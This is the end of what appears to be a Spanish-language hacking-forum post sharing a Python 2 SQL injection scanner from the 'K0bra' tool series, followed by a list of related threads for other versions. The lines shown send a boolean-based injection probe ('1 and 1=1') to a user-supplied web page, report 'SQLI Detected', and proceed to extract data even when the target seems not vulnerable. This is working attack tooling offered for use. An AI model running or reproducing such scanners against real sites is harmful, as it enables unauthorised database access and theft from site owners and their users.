  454.  codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  455.  
  456.  if not code==codedos:
  457.   print "[+] SQLI Detected"
  458.   findlength(web,passx)
  459.  else:
  460.   print "[-] Not Vulnerable"
  461.   op = raw_input("\n[+] Scan anyway y/n : ")
  462.   if op == "y":
  463.    findlength(web,passx)
  464.   elif op == "n":
  465.    reiniciar()
  466.   else:
  467.    reiniciar()
  468.  
  469. def sta(): 
  470.  
  471.  clean()
  472.  header()
  473.  
  474.  web = raw_input("\n\n[Page] : ")
  475.  bypasx = raw_input("\n\n[Bypass] : ")
  476.  if (re.findall("hackman",web,re.I)):
  477.   menu(web,bypasx)
  478.  else:
  479.   try:
  480.    scan(web,bypasx)
  481.   except:
  482.    print "\n[-] Web offline"
  483.    reiniciar()
  484.  
  485. installer()
  486. sta()
  487.  
  488. #The End 
  489.  
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] K0bra 0.5
Scripting 		BigBear 0 2,624 Último mensaje 10 Octubre 2011, 16:53 pm
por BigBear
[Perl] K0bra 1.5
Scripting 		BigBear 0 2,153 Último mensaje 1 Diciembre 2011, 22:14 pm
por BigBear
[Ruby] k0bra 0.3
Scripting 		BigBear 0 2,719 Último mensaje 16 Febrero 2012, 18:16 pm
por BigBear
[Perl] K0bra 1.6
Scripting 		BigBear 0 1,582 Último mensaje 14 Julio 2012, 19:38 pm
por BigBear
[Delphi] K0bra 1.0
Programación General 		BigBear 0 1,746 Último mensaje 26 Mayo 2013, 02:15 am
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines